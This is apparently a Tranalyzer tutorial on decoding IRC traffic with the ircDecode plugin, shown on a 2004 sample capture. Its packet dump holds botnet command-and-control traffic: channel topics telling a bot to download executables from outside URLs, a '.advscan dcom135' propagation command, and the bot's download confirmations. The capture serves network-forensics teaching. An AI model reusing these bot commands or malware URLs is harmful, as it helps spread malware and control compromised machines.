IRC: Internet Relay Chat
chat layer 7 IRC
Contents
Introduction
This tutorial discusses the plugin ircDecode.
Preparation
First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:
t2build -e -y
Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied
Then compile the core (tranalyzer2) and the following plugins:
t2build tranalyzer2 basicFlow tcpStates ircDecode txtSink
...
BUILD SUCCESSFUL
If you did not create a separate data and results directory yet, please do it now in another bash window, that facilitates your workflow:
mkdir ~/data ~/results
The sample PCAP used in this tutorial can be downloaded here: irc-channel.pcap.
Please save it in your ~/data folder.
Now you are all set for analyzing IRC traffic!
ircDecode
Let’s look at the plugin configuration first:
ircDecode
vi src/ircDecode.h
...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */
#define IRC_SAVE 0 // save content to IRC_F_PATH
#define IRC_CMD_AGGR 1 // Aggregate IRC commands/response codes
#define IRC_BITFIELD 0 // Bitfield coding of IRC commands
#define IRC_UXNMLN 10 // maximal username length
#define IRC_PXNMLN 10 // maximal password length
#define IRC_NXNMLN 10 // maximal nickname length
#define IRC_MXNMLN 50 // maximal name length
#define IRC_MAXUNM 5 // Maximal number of users
#define IRC_MAXPNM 5 // Maximal number of passwords
#define IRC_MAXNNM 5 // Maximal number of nicknames
#define IRC_MAXCNM 20 // Maximal number of parameters
/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */
#define IRC_RMDIR 1 // empty IRC_F_PATH before starting (require IRC_SAVE=1)
#define IRC_F_PATH "/tmp/IRCFILES/" // Path for extracted content
/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...Run t2 on the supplied pcap.
================================================================================ Tranalyzer 0.9.1 (Anteater), Cobra. PID: 40284, Prio: 0, SID: 666 ================================================================================ [INF] Creating flows for L2, IPv4, IPv6 Active plugins: 01: basicFlow, 0.9.1 02: tcpStates, 0.9.1 03: ircDecode, 0.9.1 04: txtSink, 0.9.1 [INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K) [INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K) Processing file: /home/user/data/irc-channel.pcap Link layer type: Ethernet [EN10MB/1] Snapshot length: 65535 (65.53 K) Dump start: 1103769025.701839000 sec (Thu 23 Dec 2004 02:30:25 GMT) Dump stop : 1103769038.791977000 sec (Thu 23 Dec 2004 02:30:38 GMT) Total dump duration: 13.090138000 sec Finished processing. Elapsed time: 0.000487842 sec Finished unloading flow memory. Time: 0.000518763 sec Percentage completed: 100.00% Number of processed packets: 48 Number of processed bytes: 8429 (8.43 K) Number of raw bytes: 8429 (8.43 K) Number of pad bytes: 54 Number of pcap bytes: 9221 (9.22 K) Number of IPv4 packets: 48 [100.00%] Number of A packets: 24 [50.00%] Number of B packets: 24 [50.00%] Number of A bytes: 2446 (2.45 K) [29.02%] Number of B bytes: 5983 (5.98 K) [70.98%] <A packet load>: 101.92 <B packet load>: 249.29 -------------------------------------------------------------------------------- tcpStates: Aggregated tcpStatesAFlags=0x02 ircDecode: Aggregated ircStat=0x03 ircDecode: Number of IRC packets: 48 [100.00%] -------------------------------------------------------------------------------- Headers count: min: 3, max: 3, avg: 3.00 Number of TCP packets: 48 [100.00%] Number of TCP bytes: 8429 (8.43 K) [100.00%] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Number of processed flows: 2 Number of processed IPv4 flows: 2 [100.00%] Number of processed A flows: 1 [50.00%] Number of processed B flows: 1 [50.00%] Number of request flows: 1 [50.00%] Number of reply flows: 1 [50.00%] Total A/B flow asymmetry: 0.00 Total req/rply flow asymmetry: 0.00 Number of processed A+B packets/A+B flows: 24.00 Number of processed A packets/A flows: 24.00 Number of processed B packets/ B flows: 24.00 Number of processed total packets/s: 3.67 Number of processed A+B packets/s: 3.67 Number of processed A packets/s: 1.83 Number of processed B packets/s: 1.83 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <Number of processed flows/s>: 0.15 <Bandwidth>: 5118 b/s (5.12 Kb/s) <Raw bandwidth>: 5151 b/s (5.15 Kb/s) Max number of flows in memory: 2 [0.00%] Memory usage: 0.03 GB [0.05%] Aggregated flowStat=0x0400000000004000 [INF] IPv4 flows
So the aggregated ircStat tells us there is IRC.
The ircStat column with value 0x03 is to be interpreted as follows: bit | ircStat | Description ============================================================================= 0 | 0x01 | IRC port found 1 | 0x02 | IRC registration successful
tcol ~/results/irc-channel_flows.txt
%dir flowInd flowStat timeFirst timeLast duration numHdrDesc numHdrs hdrDesc srcMac dstMac ethType vlanID srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags ircStat ircCC ircRC ircNumUser ircUser ircNumPass ircPass ircNumNick ircNick ircNumC ircC
A 1 0x0400000000004000 1103769025.701839000 1103769038.791977000 13.090138000 1 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 "Private network" 1049 69.64.34.124 us "GoDaddycom" 6667 6 0x02 0x01 PASS;NICK;USER;USERHOST;MODE;JOIN;PRIVMSG 1 "ghmfeirsfn" 1 "l0m3za" 1 "damn-02629" 0
B 1 0x0400000000004001 1103769025.790150000 1103769038.679021000 12.888871000 1 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us "GoDaddycom" 6667 172.16.1.10 05 "Private network" 1049 6 0x02 0x03 1;2;3;4;5;251;252;253;254;255;265;23;422;332;333;353;366;302;404 0 0 0 0
tcol irc-channel_packets.txt
%pktNo flowInd flowStat time pktIAT pktTrip flowDuration numHdrs hdrDesc vlanID srcMac dstMac ethType srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags l7Content
1 1 0x0400000000004000 1103769025.701839000 0.000000000 0.000000000 0.000000000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
2 1 0x0400000000004001 1103769025.790150000 0.000000000 0.088311040 0.000000000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00
3 1 0x0400000000004000 1103769025.790194000 0.088355000 0.000043968 0.088355000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
4 1 0x0400000000004000 1103769025.790393000 0.000199000 0.000243008 0.088554000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00 PASS l0m3za\r\n
5 1 0x0400000000004001 1103769025.884012000 0.093862000 0.093619008 0.093862000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00
6 1 0x0400000000004000 1103769025.884064000 0.093671000 0.000051968 0.182225000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00 NICK damn-0262937047\r\nUSER ghmfeirsfnw 0 0 :damn-0262937047\r\n
7 1 0x0400000000004001 1103769025.917981000 0.033969000 0.033916992 0.127831000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00 :hunt3d.devilz.net NOTICE AUTH :*** Looking up your hostname...\r\n
8 1 0x0400000000004001 1103769026.007891000 0.089910000 0.123827008 0.217741000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00
9 1 0x0400000000004000 1103769026.051260000 0.167196000 0.043369000 0.349421000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
10 1 0x0400000000004001 1103769026.065997000 0.058106000 0.014737000 0.275847000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00 :hunt3d.devilz.net NOTICE AUTH :*** Found your hostname\r\n:hunt3d.devilz.net 001 damn-0262937047 :Welcome to the devilz IRC Network damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net\r\n:hunt3d.devilz.net 002 damn-0262937047 :Your host is hunt3d.devilz.net, running version Unreal3.2\r\n:hunt3d.devilz.net 003 damn-0262937047 :This server was created Thu Sep 9 2004 at 14:58:49 CDT\r\n:hunt3d.devilz.net 004 damn-0262937047 hunt3d.devilz.net Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT\r\n:hunt3d.devilz.net 005 damn-0262937047 MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server\r\n:hunt3d.devilz.net 005 damn-0262937047 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beqa,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=devilz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server\r\n:hunt3d.devilz.net 251 damn-0262937047 :There are 1 users and 5122 invisible on 1 servers\r\n:hunt3d.devilz.net 252 damn-0262937047 2 :operator(s) online\r\n:hunt3d.devilz.net 253 damn-0262937047 14 :unknown connection(s)\r\n:hunt3d.devilz.net 254 damn-0262937047 19 :channels formed\r\n:hunt3d.devilz.net 255 damn-0262937047 :I have 5123 clients and 0 servers\r\n:hunt3d.devilz.net 265 damn-0262937047 :Current Local Users: 5123 Max: 9508\r\n:hunt3d.devilz.net 266 damn-0262937047 :Current Global Users: 51
11 1 0x0400000000004001 1103769026.151945000 0.085948000 0.100684992 0.361795000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00 23 Max: 5123\r\n:hunt3d.devilz.net 422 damn-0262937047 :MOTD File is missing\r\n:damn-0262937047 MODE damn-0262937047 :+i\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s01\r\n:hunt3d.devilz.net 332 damn-0262937047 #s01 :.download http://www.wanees.net/bbnz.exe bbnz.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s01 AL7uB 1103771901\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s01 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s01 :End of /NAMES list.\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s02\r\n:hunt3d.devilz.net 332 damn-0262937047 #s02 :.download http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker jocker.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s02 AL7uB 1103771882\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s02 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s02 :End of /NAMES list.\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s03\r\n:hunt3d.devilz.net 332 damn-0262937047 #s03 :.download http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3 ysbinstall_1000489_3.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s03 AL7uB 1103771894\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s03 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s03 :End of /NAMES list.\r\n
12 1 0x0400000000004000 1103769026.152009000 0.100749000 0.000064000 0.450170000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
13 1 0x0400000000004000 1103769026.152172000 0.000163000 0.000227008 0.450333000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00 USERHOST damn-0262937047\r\n
14 1 0x0400000000004001 1103769026.289572000 0.137627000 0.137400000 0.499422000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00
15 1 0x0400000000004000 1103769026.289639000 0.137467000 0.000067008 0.587800000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00 MODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nUSERHOST damn-0262937047\r\nMODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nUSERHOST damn-0262937047\r\nMODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nPRIVMSG #s01 :[DOWNLOAD]: Downloading URL: http://www.wanees.net/bbnz.exe to: bbnz.exe.\r\nPRIVMSG #s02 :[DOWNLOAD]: Downloading URL: http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker to: jocker.exe.\r\nPRIVMSG #s03 :[DOWNLOAD]: Downloading URL: http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3 to: ysbinstall_1000489_3.exe.\r\n
16 1 0x0400000000004001 1103769026.307624000 0.018052000 0.017984992 0.517474000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00 :hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net \r\n
17 1 0x0400000000004000 1103769026.452507000 0.162868000 0.144883008 0.750668000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
18 1 0x0400000000004001 1103769026.489405000 0.181781000 0.036897984 0.699255000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00
19 1 0x0400000000004001 1103769026.545407000 0.056002000 0.092899968 0.755257000 3 eth:ipv4:tcp 00:01:e1:01:20:e8 00:d0:59:aa:af:80 0x0800 69.64.34.124 us GoDaddycom 6667 172.16.1.10 05 Private network 1049 6 0x00 :damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#sl0w3r\r\n:hunt3d.devilz.net 332 damn-0262937047 #sl0w3r :.advscan dcom135 200 3 0 -r -s\r\n:hunt3d.devilz.net 333 damn-0262937047 #sl0w3r gh 1103760898\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #sl0w3r :damn-0262937047 @AL7uB @Under0 \r\n:hunt3d.devilz.net 366 damn-0262937047 #sl0w3r :End of /NAMES list.\r\n:hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net \r\n:hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net \r\n
20 1 0x0400000000004000 1103769026.653201000 0.200694000 0.107794048 0.951362000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00
21 1 0x0400000000004000 1103769027.129847000 0.476646000 0.584440032 1.428008000 3 eth:ipv4:tcp 00:d0:59:aa:af:80 00:01:e1:01:20:e8 0x0800 172.16.1.10 05 Private network 1049 69.64.34.124 us GoDaddycom 6667 6 0x00 PRIVMSG #s03 :[DOWNLOAD]: Downloaded 28.6 KB to ysbinstall_1000489_3.exe @ 28.6 KB/sec.\r\n
...Conclusion
Don’t forget to reset the plugin configuration for the next tutorial.
t2conf ircDecode --reset && t2build ircDecode
Have fun analyzing IRC traffic!